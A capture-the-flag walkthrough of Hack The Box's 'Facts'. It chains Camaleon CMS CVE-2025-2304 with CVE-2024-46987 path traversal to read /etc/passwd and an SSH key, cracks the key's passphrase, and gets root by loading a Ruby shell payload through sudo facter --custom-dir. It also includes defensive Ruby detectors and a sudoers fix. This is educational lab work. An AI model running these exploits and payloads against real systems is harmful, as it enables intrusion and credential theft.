HTB-Season-10-Facts
Overview
Facts is an easy-difficulty Linux machine centred around a CMS called Camaleon. The attack chain begins with account registration and privilege escalation within the CMS itself using a known CVE, followed by chaining two separate path traversal vulnerabilities — one to read /etc/passwd and another to steal an encrypted SSH private key. After cracking the key with John the Ripper, SSH access is obtained as trivia. Privilege escalation to root abuses facter's --custom-dir option, which executes arbitrary Ruby code as root via a sudo misconfiguration.
Reconnaissance
Port Scan
nmap -Pn -p- -O 10.129.3.242 --min-rate=1000
Three open ports are identified:
| Port | Service |
|---|---|
| 22 | SSH |
| 80 | HTTP |
| 54321 | Unknown |

A quick curl -I reveals a 302 Moved Temporarily redirect to http://facts.htb/, indicating virtual host routing. Adding facts.htb to /etc/hosts is required to proceed.

Web Enumeration
Directory Fuzzing
ffuf -u http://facts.htb/FUZZ -w /usr/share/wordlists/seclists/Fuzzing/fuzz-Bo0oM.txt -fs 18 -t 20

The fuzzer returns multiple /admin paths all responding with 302 redirects — confirming the presence of an admin panel. Following the redirect with curl -I -L http://facts.htb/admin reveals the application is running Camaleon CMS version 2.9.0, identifiable from the asset paths in the response headers:
link: </assets/camaleon_cms/admin/admin-basic-manifest-...css>

Foothold
CMS Account Registration & Privilege Escalation — CVE-2025-2304
Navigating to http://facts.htb/admin presents a Camaleon CMS login page with a "Create an account" option. A new account is registered with credentials rehman:rehman.

Camaleon CMS version 2.9.0 is vulnerable to CVE-2025-2304 — a privilege escalation flaw that allows a low-privileged authenticated user to escalate their role to Administrator by manipulating the password change request.
Repo: https://github.com/predyy/CVE-2025-2304
A public exploit is used to automate the escalation:
python3 exp.py http://facts.htb rehman rehman
[*] Logging in as rehman ...
[+] Login successful
[+] Got profile page
[i] Version detected: 2.9.0 (< 2.9.1) - appears to be vulnerable version
[+] authenticity_token: vtQTxnUZ43dRkKMyzstX0GT3DLt-3K_2CR_5y_1E13MgagzV...
[+] Submit successful, you should be admin

Refreshing the profile page confirms the role has been updated from Client to Administrator, granting access to the full CMS dashboard including Contents, Media, Plugins, Users, Appearance, and Settings.

Path Traversal — CVE-2024-46987 (Reading /etc/passwd)
With administrator access, a known Camaleon CMS path traversal vulnerability is leveraged. CVE-2024-46987 allows an authenticated user to download arbitrary files from the server by manipulating the file parameter:
http://facts.htb/admin/media/download_private_file?file=../../../../../../etc/passwd
Repo: https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-cp65-5m9r-vc2c
The downloaded passwd file reveals three users of interest:
trivia:x:1000:1000:facts.htb:/home/trivia:/bin/bash
william:x:1001:1001::/home/william:/bin/bash
_laurel:x:101:988::/var/log/laurel:/bin/false
_laurel is restricted from shell access and can be ignored. The focus shifts to trivia and william, and since port 22 is open, obtaining their SSH keys becomes the next objective.
SSH Key Exfiltration — CVE-2024-46987
Using the same path traversal CVE with a separate public exploit, SSH key files are enumerated using default ssh-keygen filenames:
python3 CVE-2024-46987.py -u http://facts.htb/ -l rehman -p rehman /home/trivia/.ssh/id_rsa
python3 CVE-2024-46987.py -u http://facts.htb/ -l rehman -p rehman /home/trivia/.ssh/id_ecdsa
python3 CVE-2024-46987.py -u http://facts.htb/ -l rehman -p rehman /home/trivia/.ssh/id_ed25519
The id_rsa key for trivia is successfully retrieved — and it is passphrase-protected.
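As an added example (not Camaleon CMS's own handler or either exploit script above), the check a private-file download needs to stop the traversal used in both reads, plus a detector that flags such requests in access logs; the base directory, log format and sample lines are constructed assumptions:

```ruby
require "uri"
require "cgi"

# Resolve the "file" parameter of a private-media download against its base
# directory and refuse anything that escapes it (added example, not
# Camaleon CMS's own handler; base_dir is an assumed location).
def safe_private_path(base_dir, requested)
  base = File.absolute_path(base_dir)
  # absolute_path collapses "../" but, unlike expand_path, never expands "~".
  candidate = File.absolute_path(requested.to_s, base)
  # Prefix-match on "base/" so "/var/www/private-other" is rejected too;
  # call File.realpath on the opened file if symlinks inside base matter.
  return nil unless candidate.start_with?(base + File::SEPARATOR)
  candidate
end

# Traversal after one decoding round, plus the form that survives double encoding.
TRAVERSAL = %r{\.\.[/\\]|%2e%2e(?:%2f|%5c)}i

# Flag combined-format access log lines where download_private_file is asked
# for a path that leaves the media directory.
def traversal_attempts(log_lines)
  log_lines.filter_map do |line|
    m = line.match(%r{"(?:GET|POST) (\S+) HTTP/})
    next unless m
    begin
      uri = URI.parse(m[1])
    rescue URI::InvalidURIError
      next
    end
    next unless uri.path == "/admin/media/download_private_file"
    file = URI.decode_www_form(uri.query.to_s).to_h["file"].to_s
    next unless file.match?(TRAVERSAL) || CGI.unescape(file).match?(TRAVERSAL)
    { ip: line[/\A\S+/], file: file }
  end
end

# Constructed sample: one legitimate download, the two traversal reads from
# this box (one of them double-encoded), and an unrelated admin request.
SAMPLE_LOG = [
  '10.10.14.5 - - [01/Jan/2025:10:00:00 +0000] "GET /admin/media/download_private_file?file=reports/q1.pdf HTTP/1.1" 200 512',
  '10.10.14.5 - - [01/Jan/2025:10:00:01 +0000] "GET /admin/media/download_private_file?file=../../../../../../etc/passwd HTTP/1.1" 200 1837',
  '10.10.14.9 - - [01/Jan/2025:10:00:02 +0000] "GET /admin/media/download_private_file?file=%252e%252e%252fhome%252ftrivia%252f.ssh%252fid_rsa HTTP/1.1" 200 2655',
  '10.10.14.9 - - [01/Jan/2025:10:00:03 +0000] "GET /admin/media/files?folder=media HTTP/1.1" 200 900',
].freeze
```

Run `traversal_attempts(SAMPLE_LOG)` to see the two offending requests with their source addresses; the benign download and the unrelated request are not reported.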

Cracking the SSH Key
The encrypted key is converted to a crackable hash using ssh2john, then cracked with rockyou.txt:
python3 /usr/share/john/ssh2john.py id_rsa_encrypted > ssh_hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt ssh_hash.txt
John cracks the passphrase in under 2 minutes:
grecia..school1

SSH access is obtained as trivia:
ssh -i id_rsa_encrypted trivia@facts.htb
Welcome to Ubuntu 25.04 (GNU/Linux 6.14.0-37-generic x86_64)
trivia@facts:~$

User Flag
Listing /home reveals a second user, william, and the user flag is in their home directory:
cd /home/william
cat user.txt
The user flag is retrieved.

Privilege Escalation — Facter Custom Directory
Sudo Enumeration
sudo -l
User trivia may run the following commands on facts:
(ALL) NOPASSWD: /usr/bin/facter

trivia can run /usr/bin/facter as root without a password. Checking the help output reveals a critical flag:
facter --help | grep -i "custom-dir"
[--custom-dir] A directory to use for custom facts.

Exploitation
facter loads Ruby .rb files from a custom directory and executes them. A malicious Ruby file is crafted that spawns a root bash shell:
mkdir -p /tmp/htb
cat > /tmp/htb/exploit.rb << 'EOF'
# This executes as soon as Facter loads the file
exec("/bin/bash -i")
EOF
The sudo command is triggered with the custom directory:
sudo /usr/bin/facter --custom-dir /tmp/htb
A root shell is returned immediately.
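An added example (not code from the box, facter or HTB) covering the defensive side of this finding: flagging sudo invocations of facter with a caller-chosen custom directory in auth.log, and checking whether a sudoers rule restricts arguments at all. The log lines, the trusted-directory list and the rule text are constructed assumptions.

```ruby
# Added example (not code from the box, facter or HTB): spot sudo runs of
# facter with a caller-chosen --custom-dir in auth.log, and audit the rule.
SUDO_LINE = /sudo:\s+(?<invoker>\S+) : .*?USER=(?<target>\S+) ; COMMAND=(?<cmd>.*)\z/
# Parse one syslog sudo entry into its fields; nil for any other line.
def parse_sudo_line(line)
  m = SUDO_LINE.match(line)
  return nil unless m
  argv = m[:cmd].split(" ")
  { invoker: m[:invoker], target: m[:target], binary: argv.first, args: argv.drop(1) }
end

# Accept both "--custom-dir DIR" and "--custom-dir=DIR".
def custom_dir(args)
  i = args.index { |a| a == "--custom-dir" || a.start_with?("--custom-dir=") }
  return nil unless i
  args[i].include?("=") ? args[i].split("=", 2).last : args[i + 1]
end

# Directories only root can write (assumption: replace with your site's list).
TRUSTED_FACT_DIRS = ["/usr/local/lib/site-facts"].freeze

# facter loads every .rb in the custom dir as the sudo target user, so a
# directory outside the trusted list is a privilege escalation signal.
def suspicious_facter_runs(log_lines)
  log_lines.filter_map do |line|
    ev = parse_sudo_line(line)
    next unless ev && File.basename(ev[:binary].to_s) == "facter" && ev[:target] == "root"
    dir = custom_dir(ev[:args])
    next unless dir && TRUSTED_FACT_DIRS.none? { |t| dir == t || dir.start_with?(t + "/") }
    ev.merge(custom_dir: dir)
  end
end

# Sudoers: a command with no argument spec accepts any arguments, so the
# caller picks the directory; the empty string "" means "no arguments".
WEAK_RULE  = 'trivia ALL=(ALL) NOPASSWD: /usr/bin/facter'
FIXED_RULE = 'trivia ALL=(ALL) NOPASSWD: /usr/bin/facter ""'

def unrestricted_rule?(rule)
  spec = rule.sub(/\A.*?(?:\)|:)\s*(?=\/)/, "")  # drop user, host, runas, tags
  spec.split(",").any? { |c| c.strip.split(" ").length == 1 }
end

# Constructed auth.log sample: a routine query, the abuse, and a non-sudo line.
SAMPLE_AUTH_LOG = [
  "Jan  1 10:00:00 facts sudo:   trivia : TTY=pts/0 ; PWD=/home/trivia ; USER=root ; COMMAND=/usr/bin/facter os.name",
  "Jan  1 10:00:05 facts sudo:   trivia : TTY=pts/0 ; PWD=/home/trivia ; USER=root ; COMMAND=/usr/bin/facter --custom-dir /tmp/htb",
  "Jan  1 10:00:09 facts sshd[1234]: Accepted publickey for trivia from 10.10.14.5 port 51234 ssh2",
].freeze
```

Even with the argument-restricted rule, the safer fix is to drop the sudo grant entirely unless root-level fact collection by that user is genuinely required.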

Root Flag
root@facts:~# cat root.txt
[REDACTED]
Attack Chain Summary
[Recon] nmap → ports 22, 80, 54321
↓
[Web] facts.htb → Camaleon CMS 2.9.0
↓
[CMS] Register account → CVE-2025-2304 → Role escalation to Administrator
↓
[File Read] CVE-2024-46987 path traversal → /etc/passwd → users: trivia, william
↓
[SSH Key] CVE-2024-46987 → /home/trivia/.ssh/id_rsa (encrypted)
↓
[Crack] ssh2john + john + rockyou.txt → passphrase: grecia..school1
↓
[Shell] SSH as trivia → user flag in /home/william
↓
[PrivEsc] sudo facter --custom-dir → malicious .rb → root shell
↓
[Root] cat root.txt
Key Takeaways
- CVE chaining — Two separate Camaleon CMS CVEs were chained together: privilege escalation within the CMS first, then file read as an authenticated admin.
- SSH key enumeration — When you have arbitrary file read, always try default SSH key names (id_rsa, id_ecdsa, id_ed25519) for every user with shell access.
- Facter --custom-dir — Any tool that loads and executes code from a user-specified directory, when run via sudo, is a straightforward privesc vector. Always audit what NOPASSWD binaries actually do under the hood.
- CMS version fingerprinting — Response headers and asset paths often leak the exact CMS version, making CVE lookup trivial.